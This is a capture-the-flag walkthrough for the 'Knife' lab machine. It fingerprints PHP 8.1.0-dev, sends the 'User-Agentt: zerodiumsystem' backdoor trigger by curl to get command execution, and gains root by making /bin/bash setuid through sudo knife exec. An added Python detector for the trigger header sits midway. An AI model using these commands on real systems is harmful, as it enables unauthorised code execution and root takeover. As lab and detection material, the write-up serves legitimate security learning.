Knife
Recon
Ports
nmap -sT -A -p22,80 10.129.245.100
Starting Nmap 7.95 ( https://nmap.org ) at 2025-05-21 13:21 CST
Nmap scan report for 10.129.245.100
Host is up (0.11s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 be:54:9c:a3:67:c3:15:c3:64:71:7f:6a:53:4a:4c:21 (RSA)
| 256 bf:8a:3f:d4:06:e9:2e:87:4e:c9:7e:ab:22:0e:c0:ee (ECDSA)
|_ 256 1a:de:a1:cc:37:ce:53:bb:1b:fb:2b:0b:ad:b3:f6:84 (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Emergent Medical Idea
|_http-server-header: Apache/2.4.41 (Ubuntu)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.19
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE (using proto 1/icmp)
HOP RTT ADDRESS
1 97.93 ms 10.10.14.1
2 99.32 ms 10.129.245.100
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 14.94 seconds
Ports 22 and 80 are open. Port 80 serves a static page; several directory scans turned up nothing useful. whatweb shows the web stack:
whatweb http://10.129.245.100/
http://10.129.245.100/ [200 OK] Apache[2.4.41], Country[RESERVED][ZZ], HTML5, HTTPServer[Ubuntu Linux][Apache/2.4.41 (Ubuntu)], IP[10.129.245.100], PHP[**8.1.0-dev**], Script, Title[Emergent Medical Idea], X-Powered-By[PHP/8.1.0-dev]
The PHP version is 8.1.0-dev; a quick search shows this build ships with a backdoor that can be triggered over HTTP. Try it:
curl -X GET -v http://10.129.245.100/ \
-H "User-Agentt: zerodiumsystem('id');" | head -n 3
Note: Unnecessary use of -X or --request, GET is already inferred.
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
0 0 0 0 0 0 0 0 --:--:-- --:--:-- --:--:-- 0* Trying 10.129.245.100:80...
* Connected to 10.129.245.100 (10.129.245.100) port 80
* using HTTP/1.x
> GET / HTTP/1.1
> Host: 10.129.245.100
> User-Agent: curl/8.13.0
> Accept: */*
> User-Agentt: zerodiumsystem('id');
>
* Request completely sent off
< HTTP/1.1 200 OK
< Date: Wed, 21 May 2025 06:38:13 GMT
< Server: Apache/2.4.41 (Ubuntu)
< X-Powered-By: PHP/8.1.0-dev
< Vary: Accept-Encoding
< Transfer-Encoding: chunked
< Content-Type: text/html; charset=UTF-8
<
{ [5128 bytes data]
100 5866 0 5866 0 0 272uid=1000(james) gid=1000(james) groups=1000(james)
49<!DOCTYPE html>
<html lang="en" >
100 5866 0 5866 0 0 27108 0 --:--:-- --:--:-- --:--:-- 27032
* Connection #0 to host 10.129.245.100 left intact
The output of the command is echoed back in the response.
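A defender-side check, added here and not part of the original write-up: it parses raw HTTP messages (constructed samples modelled on the curl exchange above) and flags the misspelled User-Agentt header carrying the zerodium marker, plus responses advertising PHP/8.1.0-dev. The header name, marker and banner come from the page; the function names and message layout are my own.

```python
# Added example, not from the original write-up: flag HTTP traffic carrying the
# PHP 8.1.0-dev backdoor trigger seen above, and responses advertising that build.
TRIGGER_HEADER = "user-agentt"       # misspelled header the backdoored build reads
TRIGGER_MARKER = "zerodium"          # marker the backdoor looks for in that header's value
BACKDOORED_BANNER = "PHP/8.1.0-dev"  # X-Powered-By value observed in the write-up

def parse_headers(raw: str) -> tuple[str, dict[str, str]]:
    """Split a raw HTTP message into its start line and a lower-cased header map."""
    head = raw.split("\r\n\r\n", 1)[0]
    lines = head.split("\r\n")
    headers: dict[str, str] = {}
    for line in lines[1:]:
        if ":" in line:
            name, value = line.split(":", 1)
            headers[name.strip().lower()] = value.strip()
    return lines[0], headers

def inspect_request(raw: str) -> list[str]:
    """Return findings for one raw request; an empty list means nothing suspicious."""
    _, headers = parse_headers(raw)
    findings: list[str] = []
    value = headers.get(TRIGGER_HEADER)
    if value is not None:
        findings.append("nonstandard User-Agentt header present")
        if TRIGGER_MARKER in value.lower():
            findings.append("zerodium marker in User-Agentt: backdoor trigger attempt")
    elif any(TRIGGER_MARKER in v.lower() for v in headers.values()):
        findings.append("zerodium marker in another header")  # still worth a look
    return findings

def inspect_response(raw: str) -> list[str]:
    """Flag a response whose X-Powered-By banner matches the backdoored dev build."""
    _, headers = parse_headers(raw)
    banner = headers.get("x-powered-by", "")
    if BACKDOORED_BANNER in banner:
        return [f"server advertises {banner}: verify the PHP build against a trusted source"]
    return []

# Constructed samples modelled on the curl exchange in the write-up.
SAMPLE_REQUEST = ("GET / HTTP/1.1\r\nHost: 10.129.245.100\r\nUser-Agent: curl/8.13.0\r\n"
                  "Accept: */*\r\nUser-Agentt: zerodiumsystem('id');\r\n\r\n")
CLEAN_REQUEST = "GET / HTTP/1.1\r\nHost: 10.129.245.100\r\nUser-Agent: curl/8.13.0\r\n\r\n"
SAMPLE_RESPONSE = ("HTTP/1.1 200 OK\r\nServer: Apache/2.4.41 (Ubuntu)\r\n"
                   "X-Powered-By: PHP/8.1.0-dev\r\nContent-Type: text/html\r\n\r\n<html>")

if __name__ == "__main__":
    print(inspect_request(SAMPLE_REQUEST), inspect_request(CLEAN_REQUEST))
    print(inspect_response(SAMPLE_RESPONSE))
```

Feeding the same functions with a reverse proxy's raw request dumps gives a cheap signal for the trigger; a WAF rule dropping any request with a User-Agentt header is the equivalent mitigation.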
User and Root
After obtaining a reverse shell, the current user turns out to be james:
id
uid=1000(james) gid=1000(james) groups=1000(james)
sudo -l shows:
sudo -l
Matching Defaults entries for james on knife:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User james may run the following commands on knife:
(root) NOPASSWD: /usr/bin/knife
knife
is the command-line tool for Chef, used to interact with and manage the Chef Server, nodes, cookbooks, data bags, environments and other resources. It is one of the core components of infrastructure-as-code (IaC) practice in DevOps.
Privilege escalation point
knife provides an exec subcommand that runs Ruby scripts. Here we write a one-line privilege escalation script and run it through knife exec:
system("chmod u+s /bin/bash")
Summary
An old box; an easy puzzle.